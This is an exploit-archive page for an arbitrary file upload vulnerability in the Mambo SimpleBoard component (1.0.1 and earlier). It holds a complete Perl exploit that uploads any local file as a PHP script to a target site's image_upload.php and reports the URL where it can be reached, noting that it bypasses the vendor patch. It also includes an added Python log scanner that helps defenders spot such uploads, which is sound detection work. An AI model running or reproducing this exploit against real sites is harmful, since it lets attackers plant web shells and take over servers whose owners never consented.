Mambo Component SimpleBoard <= 1.0.1 Arbitrary File Upload Exploit

2009.05.29
Credit: t0pP8uZz
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-20


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

#!/usr/bin/perl

use warnings;
use strict;
use LWP::UserAgent;
use HTTP::Request::Common;

my $fname = rand(99999) . ".php"; # no int()

print <<INTRO;
- SimpleBoard Mambo Component <= 1.0.1 -
- Remote Arbitrary File Upload Exploit -

Discovered && Coded by: t0pP8uZz
Discovered on: 20 October 2008
Vendor has not been notified!

Note: This exploit is a completely diffrent method then the prior simpleboard vulns. which differs from the one
Same files vulnerable, But this one works with the patch!

in later versions of SimpleBoard they removed the image_upload.php so this wont work.
but this works on every image_upload.php version. with the patch in place!

A common error for the exploit is if openbase_dir is enabled, then this means
the file will not get uploaded due to the dir restrictions.

- Peace -
irc.rizon.net #sectalk

INTRO

print "\nEnter URL(ie: http://site.com/mambo): ";
chomp(my $url=<STDIN>);

print "\nEnter File Path(path to local file to upload): ";
chomp(my $file=<STDIN>);

my $ua = LWP::UserAgent->new;
my $re = $ua->request(POST $url.'/components/com_simpleboard/image_upload.php',
    Content_Type => 'form-data',
    Content      => [ attachimage => [ $file, $fname, Content_Type => 'image/jpeg' ], ] );

die "HTTP POST Failed!" unless $re->is_success;

if($re->content =~ /open_basedir/) {
    print "open_basedir restriction enabled. Exploit failed. See php.ini for more details.\n"; # say() ? get perl510
} else {
    print "Looks like exploit was successfull! for uploaded file check: " . $url . "/components/com_simpleboard/" . $fname . "\n";
}

exit;
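For defenders, the request pattern in the script above (a POST to image_upload.php, then a request for a PHP file in the same component directory) can be searched for in web server access logs. The following is an added example, not part of the original advisory; it assumes Combined Log Format, and the function name, sample IPs and sample file name are constructed for illustration.

```python
import re
from urllib.parse import urlsplit

COMPONENT_DIR = "/components/com_simpleboard/"
UPLOAD = COMPONENT_DIR + "image_upload.php"
# Combined Log Format: ip ident user [time] "METHOD target PROTO" status size
LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')

def find_upload_abuse(lines):
    """Return (upload_posts, new_php_hits) as lists of (time, ip, path)."""
    baseline = set()   # PHP scripts in the component dir seen before any upload POST
    uploads, hits = [], []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        ip, when, method, target, status = m.groups()
        path = urlsplit(target).path
        if method == "POST" and path.endswith(UPLOAD):
            uploads.append((when, ip, path))   # every upload attempt is worth review
            continue
        idx = path.find(COMPONENT_DIR)
        if idx == -1 or not path.lower().endswith(".php"):
            continue
        name = path[idx + len(COMPONENT_DIR):]
        if not uploads:
            baseline.add(name)
        elif name not in baseline and status.startswith("2"):
            hits.append((when, ip, path))      # script first served after an upload
    return uploads, hits

# Constructed sample log lines (documentation IP ranges, made-up file name).
SAMPLE_LOG = [
    '198.51.100.7 - - [20/Oct/2008:10:00:01 +0000] "GET /mambo/components/com_simpleboard/image_upload.php HTTP/1.1" 200 512',
    '192.0.2.10 - - [20/Oct/2008:10:05:12 +0000] "POST /mambo/components/com_simpleboard/image_upload.php HTTP/1.1" 200 734',
    '192.0.2.10 - - [20/Oct/2008:10:05:15 +0000] "GET /mambo/components/com_simpleboard/48213.5520934.php HTTP/1.1" 200 19',
    '198.51.100.7 - - [20/Oct/2008:10:06:00 +0000] "GET /mambo/components/com_simpleboard/image_upload.php HTTP/1.1" 200 512',
    '198.51.100.7 - - [20/Oct/2008:10:06:30 +0000] "GET /mambo/index.php?option=com_simpleboard HTTP/1.1" 200 8841',
]

if __name__ == "__main__":
    posts, new_scripts = find_upload_abuse(SAMPLE_LOG)
    for when, ip, path in posts:
        print("upload POST     ", when, ip, path)
    for when, ip, path in new_scripts:
        print("new PHP after it", when, ip, path)
```

The baseline is only as good as the log window: scripts the component legitimately ships but that were never requested before the first upload POST will also be reported and need manual triage.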

References:

http://xforce.iss.net/xforce/xfdb/46223
http://www.securityfocus.com/bid/31981
http://www.milw0rm.com/exploits/6868



Copyright 2024, cxsecurity.com

 
